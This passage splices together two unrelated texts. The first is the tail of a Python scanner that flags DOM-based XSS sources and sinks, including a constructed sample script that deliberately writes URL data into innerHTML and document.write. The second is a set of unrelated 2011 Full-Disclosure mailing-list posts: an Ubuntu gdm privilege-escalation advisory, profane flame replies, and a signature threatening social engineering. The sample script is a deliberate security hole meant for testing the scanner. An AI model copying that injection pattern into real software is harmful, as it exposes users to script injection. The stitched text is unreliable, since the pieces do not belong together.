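    'eval(', 'Function(', 'setTimeout(', 'setInterval(',
]
# Crude comment stripper: also eats "//" inside string literals, acceptable here.
COMMENT_RE = re.compile(r'/\*.*?\*/|//[^\n]*', re.S)
# "var x = ..." or "x = ..." at the start of a statement: x becomes tainted when
# the statement reads a source. One level of propagation only, by design.
ASSIGN_RE = re.compile(r'^(?:(?:var|let|const)\s+)?([A-Za-z_$][\w$]*)\s*=(?!=)')


def find_sources(stmt, tainted):
    """Sources read by a statement: literal DOM sources plus tainted variables."""
    found = [s for s in DOM_SOURCES if s in stmt]
    found += [v for v in sorted(tainted) if re.search(r'\b' + re.escape(v) + r'\b', stmt)]
    return found


def audit_js(js_text):
    """One finding per statement that reads a source: 'high' when the same statement
    also writes to a sink, 'info' otherwise (needs manual follow-up)."""
    code = COMMENT_RE.sub('', js_text)
    tainted = set()
    findings = []
    for number, raw in enumerate(code.split(';'), start=1):
        stmt = ' '.join(raw.split())          # collapse whitespace and newlines
        if not stmt:
            continue
        sources = find_sources(stmt, tainted)
        if not sources:
            continue
        sinks = [k for k in DOM_SINKS if k in stmt]
        assigned = ASSIGN_RE.match(stmt)
        if assigned:
            tainted.add(assigned.group(1))    # value derived from a source
        findings.append({
            'statement': number,
            'severity': 'high' if sinks else 'info',
            'sources': sources,
            'sinks': sinks,
            'code': stmt,
        })
    return findings


# Constructed sample script (not from any real site) exercising each case.
SAMPLE_JS = """
// search results page
var q = document.location.search.substring(1);
document.getElementById('out').innerHTML = 'Results for ' + q;
var ref = document.referrer;
console.log(ref);
var safe = encodeURIComponent(location.href);
document.write('<a href="' + document.URL + '">home</a>');
"""

if __name__ == '__main__':
    for f in audit_js(SAMPLE_JS):
        print(f"[{f['severity']}] stmt {f['statement']}: {f['sources']} -> {f['sinks'] or '-'}")
```

Statement 5 is reported as 'info' even though the value is encoded, which is deliberate: the scanner only shows where a source is read, and the reviewer decides whether the encoding is adequate for where the value ends up.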



[Full-disclosure] [USN-1099-1] GDM vulnerability

2011-03-30 Thread Steve Beattie
===
Ubuntu Security Notice USN-1099-1                        March 30, 2011
gdm vulnerability
CVE-2011-0727
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.10
Ubuntu 10.04 LTS
Ubuntu 10.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.10:
  gdm 2.28.1-0ubuntu2.3

Ubuntu 10.04 LTS:
  gdm 2.30.2.is.2.30.0-0ubuntu5.1

Ubuntu 10.10:
  gdm 2.30.5-0ubuntu4.1

After a standard system update you need to log out all desktop sessions
and restart GDM to make all the necessary changes.

Details follow:

Sebastian Krahmer discovered that GDM (GNOME Display Manager) did not
properly drop privileges when handling the cache directories used
to store users' dmrc and face icon files. This could allow a local
attacker to change the ownership of arbitrary files, thereby gaining
root privileges.


Updated packages for Ubuntu 9.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3.diff.gz
  Size/MD5:   769588 17bc09f417591f1913940d47cec9cc35
http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3.dsc
  Size/MD5: 2168 09c46d7f6f577daa95f47643025ea67c
http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.28.1.orig.tar.gz
  Size/MD5:  3661916 b8f101394aa73e4505bad4ed4f0a695c

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3_amd64.deb
  Size/MD5:   731002 0e00de9426edb0a1dd9cd74d86251548

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3_i386.deb
  Size/MD5:   672338 2e903d2e97356a7a7138f1da9c37c27a

  armel architecture (ARM Architecture):

http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3_armel.deb
  Size/MD5:   662246 d6a5a00bc8e37ab1e8ab6faaec9efb42

  lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3_lpia.deb
  Size/MD5:   669764 79d09e696d5ff527e86a263944cdf7db

  powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3_powerpc.deb
  Size/MD5:   697456 eff967e0f0206a299f68e93b76f48d13

  sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3_sparc.deb
  Size/MD5:   681890 23eec0f66ceb24635f86e3e4f3d06ade

Updated packages for Ubuntu 10.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1.diff.gz
  Size/MD5:   795064 e314a75da58ead79bd79cac83730c057

http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1.dsc
  Size/MD5: 2223 ea497892c7cc53f86ea3769c78e75962

http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.2.is.2.30.0.orig.tar.gz
  Size/MD5:  3725698 583f6e50936f085be268e8543905fb74

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1_amd64.deb
  Size/MD5:   798524 1e7b5dee40db568fcafa7d5f8c085c65

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1_i386.deb
  Size/MD5:   734446 1de50ebe2d1a869a3cc2a4ffb7136de9

  armel architecture (ARM Architecture):


http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1_armel.deb
  Size/MD5:   725942 f443a1c4098e116c293ebd9bc153f661

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1_powerpc.deb
  Size/MD5:   760048 30592a26d7d20bc8b70d24543baf6182

  sparc architecture (Sun SPARC/UltraSPARC):


http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1_sparc.deb
  Size/MD5:   753996 be562ec975b051a5e6909b394fc5cbc7

Updated packages for Ubuntu 10.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.5-0ubuntu4.1.debian.tar.gz
  Size/MD5:   112891 a3aee3567a60f658b826668807c4dc6e
http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.5-0ubuntu4.1.dsc
  Size/MD5: 2187 07a449c1f9b1b1b393b92608f019cfd8
http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.5.orig.tar.gz
  Size/MD5:  3784180 9d200a16d6bbab0ac41b93b9dbe6d508

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.5-0ubuntu4.1_amd64.deb
  Size/MD5:   808788 c88e512ff6c1d9b0afe2553bca3aaa0c

  i386 architecture (x86 compatible Intel/AMD):



Re: [Full-disclosure] SSL Capable NetCat and more

2011-03-30 Thread Randal T. Rioux
On 3/27/2011 4:29 PM, Dan Tulovsky wrote:
 Beside that, scnc is written in pure-Perl, and is easily modifiable
 by anyone. Such really simple (dumb?) stuff should not be written in
 low-level languages such as C.
 
 You can't be serious...

Shirley, he is.

Perl is shite. It's a dependency hell, it lacks the logic of C/C++ and
is interpreted (as pointed out by others). Any code base can be
modifiable by anyone - as long as it is open sourced.

Don't get me wrong, I'm not criticizing the product. I think reinventing
the wheel in lesser performing methods is great. Just don't disregard C.
To be honest, in my code auditing days, it was SO much easier to find
flaws in C/C++ than Perl, because Perl is just messy and ugly. Something
looks wrong, but it's right. Uggh!

But if you need to write something quick for an easy task, by all means,
hit the Perl.

It's like using Java to write large scale enterprise products. Who the
hell? Why? Portability is nice, but performance is better. Java belongs
in the small-scale realm of applications.

Grumble grumble. Get off my lawn. Back to the lair :-)

Randy



Re: [Full-disclosure] Your email message was blocked

2011-03-30 Thread Randal T. Rioux
On 3/30/2011 11:31 PM, r...@bellaliant.ca wrote:
 The following email message was *blocked* by Bell Aliant Content
 Filtering Device:
   
*From:*  ra...@procyonlabs.com
*To:*peter.mo...@bellaliant.ca
*Subject:*   Re: [Full-disclosure] SSL Capable NetCat and more
*Message:*   B4d93f5990001.0001.0003.mml
 
 Because it may contain *unacceptable language*, or *inappropriate
 material*.  Please remove any unacceptable or inappropriate language and
 resend the message.
 
 The blocked email will be automatically deleted after *5 days.
 *
 Content Rule: Policy Management (Inbound) : Block Common & Mild Profanity
 
 r...@bellaliant.ca
 

F**K YOU.

Here's a nickel - get yourself a real mail server.

Randy

-- 
Disclaimer:

By sending an email to ANY of my addresses you are agreeing that:

1. I am, by definition, the intended recipient
2. All information in the email is mine to do with as I see fit
3. I will take the contents as representing the views of your company
4. If your email is an Out of Office reply on a mailing list, I will
social engineer your company
5. This notification overrides any disclaimer or statement of
confidentiality that may be included on your message

Further, you understand that if any of the following conditions are met
that you are indeed, a bag of douche:

1. Your message identifies the device you sent it from
2. You messed up the thread by top-posting



Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread Randal T. Rioux
On 3/29/2011 9:13 PM, runlvl wrote:
 Insecurity Research is happy to announce the release of version 2.5,
 get it now while is still hot !
 
 Insect Pro 2.5 is a penetration security auditing and testing software
 solution designed to allow organizations of all sizes mitigate,
 monitor and manage the latest security threats vulnerabilities.
 
 We’re always working to improve Insect Pro and now the users obtain
 a new feature: A fully automated active web application security
 reconnaissance tool.
 
 Check it out: http://www.youtube.com/watch?v=ifiyHem7fMA
 
 We invite you to take a visual tour where you can find screenshots and
 videos, visit us now at http://www.insecurityresearch.com
 
 There is no fixed price to get a copy, you can obtain the full version
 by making a minimum donation to keep us coding.
 
 We are really thankful to the community!

I keep getting this error when trying to download:

Please enter an amount greater than zero.

Can you fix that so I can test out the software? I'm really curious
about how much code was lifted from other projects. Nice logo though!

Thanks,
Randy

Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread Randal T. Rioux
On 3/29/2011 9:13 PM, runlvl wrote:
 Insecurity Research is happy to announce the release of version 2.5,
 get it now while it's still hot!
snip

Oh! And you list the Dept. of Energy as a customer. I used to work
there, and still talk to a lot of the security offices for various
locations. They've never heard of it.

Also, did you get clearance from the DoE's Office of Public Affairs to
list them as a customer? They get touchy about that sort of stuff.

Randy



Re: [Full-disclosure] nuclear plants reach software quality levels

2011-03-30 Thread Peter Osterberg
I know what you are trying to say, but I don't agree with your math if
this is a cyclic event that has a 500 year cycle. Risk will increase the closer
you get to when it's supposed to happen.

There is of course no such thing as cyclic events in a Casino. It's
supposed to be purely random. Unless you play rigged slot machines.
--
Sent from my Android phone with K-9 E-post. Excuse my brevity.

Graham Gower graham.go...@gmail.com wrote:

On 30 March 2011 21:53, Peter Osterberg j...@vel.nu wrote:
 Risk would be a lot higher than 10 percent if it was, say, 300 years since the last tsunami

Time to go back to school. Or, perhaps you'd like to come play at my casino...
